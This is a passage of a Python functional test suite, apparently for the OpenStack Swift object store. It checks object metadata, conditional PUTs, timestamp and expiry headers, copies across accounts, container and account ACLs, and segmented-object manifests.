'X-Object-Meta-food': 'PizZa',
}
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Color': 'blUe',
'X-Object-Meta-Food': 'PizZa',
})
# metadata post
req_metadata = {'X-Object-Meta-color': 'oraNge'}
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 202)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Color': 'oraNge'
})
# sysmeta put
req_metadata = {
'X-Object-Meta-Color': 'Red',
'X-Object-Sysmeta-Color': 'Green',
'X-Object-Transient-Sysmeta-Color': 'Blue',
}
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Color': 'Red',
})
# sysmeta post
req_metadata = {
'X-Object-Meta-Food': 'Burger',
'X-Object-Meta-Animal': 'Cat',
'X-Object-Sysmeta-Animal': 'Cow',
'X-Object-Transient-Sysmeta-Food': 'Burger',
}
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 202)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Food': 'Burger',
'X-Object-Meta-Animal': 'Cat',
})
# non-ascii put
req_metadata = {
'X-Object-Meta-Foo': u'B\u00e2r',
}
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Foo': 'B\xc3\xa2r',
})
# non-ascii post
req_metadata = {
'X-Object-Meta-Foo': u'B\u00e5z',
}
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 202)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {
'X-Object-Meta-Foo': 'B\xc3\xa5z',
})
def test_if_none_match(self):
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, self.container, 'if_none_match_test'), '',
{'X-Auth-Token': token})
return check_response(conn)
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, 'if_none_match_test'), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'If-None-Match': '*'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 412)
resp = retry(delete)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, 'if_none_match_test'), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'If-None-Match': 'somethingelse'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 400)
def test_too_small_x_timestamp(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'too_small_x_timestamp'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Timestamp': '-1'})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', '%s/%s/%s' % (parsed.path, self.container,
'too_small_x_timestamp'),
'', {'X-Auth-Token': token,
'Content-Length': '0'})
return check_response(conn)
ts_before = time.time()
time.sleep(0.05)
resp = retry(put)
body = resp.read()
time.sleep(0.05)
ts_after = time.time()
if resp.status == 400:
# shunt_inbound_x_timestamp must be false
self.assertIn(
'X-Timestamp should be a UNIX timestamp float value', body)
else:
self.assertEqual(resp.status, 201)
self.assertEqual(body, '')
resp = retry(head)
resp.read()
self.assertGreater(float(resp.headers['x-timestamp']), ts_before)
self.assertLess(float(resp.headers['x-timestamp']), ts_after)
def test_too_big_x_timestamp(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'too_big_x_timestamp'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Timestamp': '99999999999.9999999999'})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', '%s/%s/%s' % (parsed.path, self.container,
'too_big_x_timestamp'),
'', {'X-Auth-Token': token,
'Content-Length': '0'})
return check_response(conn)
ts_before = time.time()
time.sleep(0.05)
resp = retry(put)
body = resp.read()
time.sleep(0.05)
ts_after = time.time()
if resp.status == 400:
# shunt_inbound_x_timestamp must be false
self.assertIn(
'X-Timestamp should be a UNIX timestamp float value', body)
else:
self.assertEqual(resp.status, 201)
self.assertEqual(body, '')
resp = retry(head)
resp.read()
self.assertGreater(float(resp.headers['x-timestamp']), ts_before)
self.assertLess(float(resp.headers['x-timestamp']), ts_after)
def test_x_delete_after(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'x_delete_after'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-After': '2'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def get(url, token, parsed, conn):
conn.request(
'GET',
'%s/%s/%s' % (parsed.path, self.container, 'x_delete_after'),
'',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
resp.read()
count = 0
while resp.status == 200 and count < 10:
resp = retry(get)
resp.read()
count += 1
time.sleep(0.5)
self.assertEqual(resp.status, 404)
# To avoid an error when the object deletion in tearDown(),
# the object is added again.
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def test_x_delete_at(self):
def put(url, token, parsed, conn):
dt = datetime.datetime.now()
epoch = time.mktime(dt.timetuple())
delete_time = str(int(epoch) + 3)
conn.request(
'PUT',
'%s/%s/%s' % (parsed.path, self.container, 'x_delete_at'),
'',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-At': delete_time})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def get(url, token, parsed, conn):
conn.request(
'GET',
'%s/%s/%s' % (parsed.path, self.container, 'x_delete_at'),
'',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
resp.read()
count = 0
while resp.status == 200 and count < 10:
resp = retry(get)
resp.read()
count += 1
time.sleep(1)
self.assertEqual(resp.status, 404)
# To avoid an error when the object deletion in tearDown(),
# the object is added again.
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def test_non_integer_x_delete_after(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'non_integer_x_delete_after'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-After': '*'})
return check_response(conn)
resp = retry(put)
body = resp.read()
self.assertEqual(resp.status, 400)
self.assertEqual(body, 'Non-integer X-Delete-After')
def test_non_integer_x_delete_at(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'non_integer_x_delete_at'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-At': '*'})
return check_response(conn)
resp = retry(put)
body = resp.read()
self.assertEqual(resp.status, 400)
self.assertEqual(body, 'Non-integer X-Delete-At')
def test_x_delete_at_in_the_past(self):
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (parsed.path, self.container,
'x_delete_at_in_the_past'),
'', {'X-Auth-Token': token,
'Content-Length': '0',
'X-Delete-At': '0'})
return check_response(conn)
resp = retry(put)
body = resp.read()
self.assertEqual(resp.status, 400)
self.assertEqual(body, 'X-Delete-At in past')
def test_copy_object(self):
if tf.skip:
raise SkipTest
source = '%s/%s' % (self.container, self.obj)
dest = '%s/%s' % (self.container, 'test_copy')
# get contents of source
def get_source(url, token, parsed, conn):
conn.request('GET',
'%s/%s' % (parsed.path, source),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get_source)
source_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(source_contents, 'test')
# copy source to dest with X-Copy-From
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s' % (parsed.path, dest), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Copy-From': source})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
def get_dest(url, token, parsed, conn):
conn.request('GET',
'%s/%s' % (parsed.path, dest),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get_dest)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents)
# delete the copy
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s' % (parsed.path, dest), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
# verify dest does not exist
resp = retry(get_dest)
resp.read()
self.assertEqual(resp.status, 404)
# copy source to dest with COPY
def copy(url, token, parsed, conn):
conn.request('COPY', '%s/%s' % (parsed.path, source), '',
{'X-Auth-Token': token,
'Destination': dest})
return check_response(conn)
resp = retry(copy)
resp.read()
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
resp = retry(get_dest)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents)
# copy source to dest with COPY and range
def copy(url, token, parsed, conn):
conn.request('COPY', '%s/%s' % (parsed.path, source), '',
{'X-Auth-Token': token,
'Destination': dest,
'Range': 'bytes=1-2'})
return check_response(conn)
resp = retry(copy)
resp.read()
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
resp = retry(get_dest)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents[1:3])
# delete the copy
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_copy_between_accounts(self):
if tf.skip2:
raise SkipTest
source = '%s/%s' % (self.container, self.obj)
dest = '%s/%s' % (self.container, 'test_copy')
# get contents of source
def get_source(url, token, parsed, conn):
conn.request('GET',
'%s/%s' % (parsed.path, source),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get_source)
source_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(source_contents, 'test')
acct = tf.parsed[0].path.split('/', 2)[2]
# copy source to dest with X-Copy-From-Account
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s' % (parsed.path, dest), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Copy-From-Account': acct,
'X-Copy-From': source})
return check_response(conn)
# try to put, will not succeed
# user does not have permissions to read from source
resp = retry(put, use_account=2)
self.assertEqual(resp.status, 403)
# add acl to allow reading from source
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[1]})
return check_response(conn)
resp = retry(post)
self.assertEqual(resp.status, 204)
# retry previous put, now should succeed
resp = retry(put, use_account=2)
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
def get_dest(url, token, parsed, conn):
conn.request('GET',
'%s/%s' % (parsed.path, dest),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get_dest, use_account=2)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents)
# delete the copy
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s' % (parsed.path, dest), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete, use_account=2)
resp.read()
self.assertIn(resp.status, (204, 404))
# verify dest does not exist
resp = retry(get_dest, use_account=2)
resp.read()
self.assertEqual(resp.status, 404)
acct_dest = tf.parsed[1].path.split('/', 2)[2]
# copy source to dest with COPY
def copy(url, token, parsed, conn):
conn.request('COPY', '%s/%s' % (parsed.path, source), '',
{'X-Auth-Token': token,
'Destination-Account': acct_dest,
'Destination': dest})
return check_response(conn)
# try to copy, will not succeed
# user does not have permissions to write to destination
resp = retry(copy)
resp.read()
self.assertEqual(resp.status, 403)
# add acl to allow write to destination
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token,
'X-Container-Write': tf.swift_test_perm[0]})
return check_response(conn)
resp = retry(post, use_account=2)
self.assertEqual(resp.status, 204)
# now copy will succeed
resp = retry(copy)
resp.read()
self.assertEqual(resp.status, 201)
# contents of dest should be the same as source
resp = retry(get_dest, use_account=2)
dest_contents = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(dest_contents, source_contents)
# delete the copy
resp = retry(delete, use_account=2)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_public_object(self):
if tf.skip:
raise SkipTest
def get(url, token, parsed, conn):
conn.request('GET',
'%s/%s/%s' % (parsed.path, self.container, self.obj))
return check_response(conn)
try:
resp = retry(get)
raise Exception('Should not have been able to GET')
except Exception as err:
self.assertTrue(str(err).startswith('No result after '))
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token,
'X-Container-Read': '.r:*'})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(get)
resp.read()
self.assertEqual(resp.status, 200)
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token, 'X-Container-Read': ''})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
try:
resp = retry(get)
raise Exception('Should not have been able to GET')
except Exception as err:
self.assertTrue(str(err).startswith('No result after '))
def test_private_object(self):
if tf.skip or tf.skip3:
raise SkipTest
# Ensure we can't access the object with the third account
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, self.obj), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# create a shared container writable by account3
shared_container = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s' % (
parsed.path, shared_container), '',
{'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[2],
'X-Container-Write': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account can not copy from private container
def copy(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, shared_container, 'private_object'), '',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Copy-From': '%s/%s' % (self.container, self.obj)})
return check_response(conn)
resp = retry(copy, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# verify third account can write "obj1" to shared container
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), 'test',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account can copy "obj1" to shared container
def copy2(url, token, parsed, conn):
conn.request('COPY', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token,
'Destination': '%s/%s' % (shared_container, 'obj1')})
return check_response(conn)
resp = retry(copy2, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account STILL can not copy from private container
def copy3(url, token, parsed, conn):
conn.request('COPY', '%s/%s/%s' % (
parsed.path, self.container, self.obj), '',
{'X-Auth-Token': token,
'Destination': '%s/%s' % (shared_container,
'private_object')})
return check_response(conn)
resp = retry(copy3, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# clean up "obj1"
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
# clean up shared_container
def delete(url, token, parsed, conn):
conn.request('DELETE',
parsed.path + '/' + shared_container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_container_write_only(self):
if tf.skip or tf.skip3:
raise SkipTest
# Ensure we can't access the object with the third account
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, self.obj), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# create a shared container writable (but not readable) by account3
shared_container = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s' % (
parsed.path, shared_container), '',
{'X-Auth-Token': token,
'X-Container-Write': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account can write "obj1" to shared container
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), 'test',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put, use_account=3)
resp.read()
self.assertEqual(resp.status, 201)
# verify third account cannot copy "obj1" to shared container
def copy(url, token, parsed, conn):
conn.request('COPY', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token,
'Destination': '%s/%s' % (shared_container, 'obj2')})
return check_response(conn)
resp = retry(copy, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# verify third account can POST to "obj1" in shared container
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token,
'X-Object-Meta-Color': 'blue'})
return check_response(conn)
resp = retry(post, use_account=3)
resp.read()
self.assertEqual(resp.status, 202)
# verify third account can DELETE from shared container
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, shared_container, 'obj1'), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete, use_account=3)
resp.read()
self.assertIn(resp.status, (204, 404))
# clean up shared_container
def delete(url, token, parsed, conn):
conn.request('DELETE',
parsed.path + '/' + shared_container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
@requires_acls
def test_read_only(self):
if tf.skip3:
raise tf.SkipTest
def get_listing(url, token, parsed, conn):
conn.request('GET', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def get(url, token, parsed, conn, name):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, name), 'test',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list objects
resp = retry(get_listing, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# cannot get object
resp = retry(get, self.obj, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-only access
acl_user = tf.swift_test_user[2]
acl = {'read-only': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can list objects
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.obj, listing)
# can get object
resp = retry(get, self.obj, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(body, 'test')
# can not put an object
obj_name = str(uuid4())
resp = retry(put, obj_name, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 403)
# can not delete an object
resp = retry(delete, self.obj, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 403)
# sanity with account1
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertNotIn(obj_name, listing)
self.assertIn(self.obj, listing)
@requires_acls
def test_read_write(self):
if tf.skip3:
raise SkipTest
def get_listing(url, token, parsed, conn):
conn.request('GET', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def get(url, token, parsed, conn, name):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, name), 'test',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list objects
resp = retry(get_listing, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# cannot get object
resp = retry(get, self.obj, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-write access
acl_user = tf.swift_test_user[2]
acl = {'read-write': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can list objects
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.obj, listing)
# can get object
resp = retry(get, self.obj, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(body, 'test')
# can put an object
obj_name = str(uuid4())
resp = retry(put, obj_name, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 201)
# can delete an object
resp = retry(delete, self.obj, use_account=3)
body = resp.read()
self.assertIn(resp.status, (204, 404))
# sanity with account1
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(obj_name, listing)
self.assertNotIn(self.obj, listing)
@requires_acls
def test_admin(self):
if tf.skip3:
raise SkipTest
def get_listing(url, token, parsed, conn):
conn.request('GET', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def get(url, token, parsed, conn, name):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, name), 'test',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list objects
resp = retry(get_listing, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# cannot get object
resp = retry(get, self.obj, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant admin access
acl_user = tf.swift_test_user[2]
acl = {'admin': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can list objects
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.obj, listing)
# can get object
resp = retry(get, self.obj, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(body, 'test')
# can put an object
obj_name = str(uuid4())
resp = retry(put, obj_name, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 201)
# can delete an object
resp = retry(delete, self.obj, use_account=3)
body = resp.read()
self.assertIn(resp.status, (204, 404))
# sanity with account1
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(obj_name, listing)
self.assertNotIn(self.obj, listing)
def test_manifest(self):
if tf.skip:
raise SkipTest
# Data for the object segments
segments1 = ['one', 'two', 'three', 'four', 'five']
segments2 = ['six', 'seven', 'eight']
segments3 = ['nine', 'ten', 'eleven']
# Upload the first set of segments
def put(url, token, parsed, conn, objnum):
conn.request('PUT', '%s/%s/segments1/%s' % (
parsed.path, self.container, str(objnum)), segments1[objnum],
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments1)):
resp = retry(put, objnum)
resp.read()
self.assertEqual(resp.status, 201)
# Upload the manifest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token,
'X-Object-Manifest': '%s/segments1/' % self.container,
'Content-Type': 'text/jibberish', 'Content-Length': '0'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# Get the manifest (should get all the segments as the body)
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1))
self.assertEqual(resp.status, 200)
self.assertEqual(resp.getheader('content-type'), 'text/jibberish')
# Get with a range at the start of the second segment
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token, 'Range': 'bytes=3-'})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1[1:]))
self.assertEqual(resp.status, 206)
# Get with a range in the middle of the second segment
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token, 'Range': 'bytes=5-'})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1)[5:])
self.assertEqual(resp.status, 206)
# Get with a full start and stop range
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token, 'Range': 'bytes=5-10'})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1)[5:11])
self.assertEqual(resp.status, 206)
# Upload the second set of segments
def put(url, token, parsed, conn, objnum):
conn.request('PUT', '%s/%s/segments2/%s' % (
parsed.path, self.container, str(objnum)), segments2[objnum],
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments2)):
resp = retry(put, objnum)
resp.read()
self.assertEqual(resp.status, 201)
# Get the manifest (should still be the first segments of course)
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1))
self.assertEqual(resp.status, 200)
# Update the manifest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token,
'X-Object-Manifest': '%s/segments2/' % self.container,
'Content-Length': '0'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# Get the manifest (should be the second set of segments now)
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments2))
self.assertEqual(resp.status, 200)
if not tf.skip3:
# Ensure we can't access the manifest with the third account
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# Grant access to the third account
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s' % (parsed.path, self.container),
'', {'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# The third account should be able to get the manifest now
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
self.assertEqual(resp.read(), ''.join(segments2))
self.assertEqual(resp.status, 200)
# Create another container for the third set of segments
acontainer = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', parsed.path + '/' + acontainer, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# Upload the third set of segments in the other container
def put(url, token, parsed, conn, objnum):
conn.request('PUT', '%s/%s/segments3/%s' % (
parsed.path, acontainer, str(objnum)), segments3[objnum],
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments3)):
resp = retry(put, objnum)
resp.read()
self.assertEqual(resp.status, 201)
# Update the manifest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/manifest' % (
parsed.path, self.container), '',
{'X-Auth-Token': token,
'X-Object-Manifest': '%s/segments3/' % acontainer,
'Content-Length': '0'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# Get the manifest to ensure it's the third set of segments
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments3))
self.assertEqual(resp.status, 200)
if not tf.skip3:
# Ensure we can't access the manifest with the third account
# (because the segments are in a protected container even if the
# manifest itself is not).
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# Grant access to the third account
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s' % (parsed.path, acontainer),
'', {'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# The third account should be able to get the manifest now
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
